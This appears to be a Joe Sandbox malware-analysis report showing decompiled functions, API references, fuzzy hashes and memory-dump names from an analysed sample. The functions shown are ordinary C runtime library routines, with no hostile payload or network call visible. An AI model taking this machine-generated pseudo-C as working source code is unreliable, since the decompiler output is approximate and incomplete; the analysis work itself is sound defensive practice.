Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction ID: f67bb99a7556266d83703f1328879a053cbf51becb24ad8f6a6c07a397172180
Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction Fuzzy Hash: A6112C323086115FEB258F2DBC70F653392EB84328B644276E616CB7E4E775DC828A58

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 02DA1B57 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02DA1B6D
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 02DA1B96
GetLastError.KERNEL32 ref: 02DA1BA7
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02DA1BBF
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 02DA1BE7

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: e6c84e72ac00051910403d3760501a90802677e0732db5c652406b0ade332257
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 3D11B2311013647BD23097158C98F677F6CEB86BA9F048114F9899A381D721EC04C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 02DAC9AF Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 02DAC9E3
__locking.LIBCMT ref: 02DAC9F8

Part of subcall function 02DAC228: __getptd_noexit.LIBCMT ref: 02DAC228

Memory Dump Source

Source File: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2da0000_con1165.jbxd

Yara matches

Similarity

API ID: __fileno__getptd_noexit__locking
String ID:
API String ID: 630670418-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 1da3ba41233c73004db23bfd7ac9a04c41d16a1b17b419359b5ebbcbb197260b
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: 0451B371E15209AFDB11CF68C9A0FA9BBB1FF05368F14816AD916A7381D731EE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.316168321.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.316168321.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_con1165.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
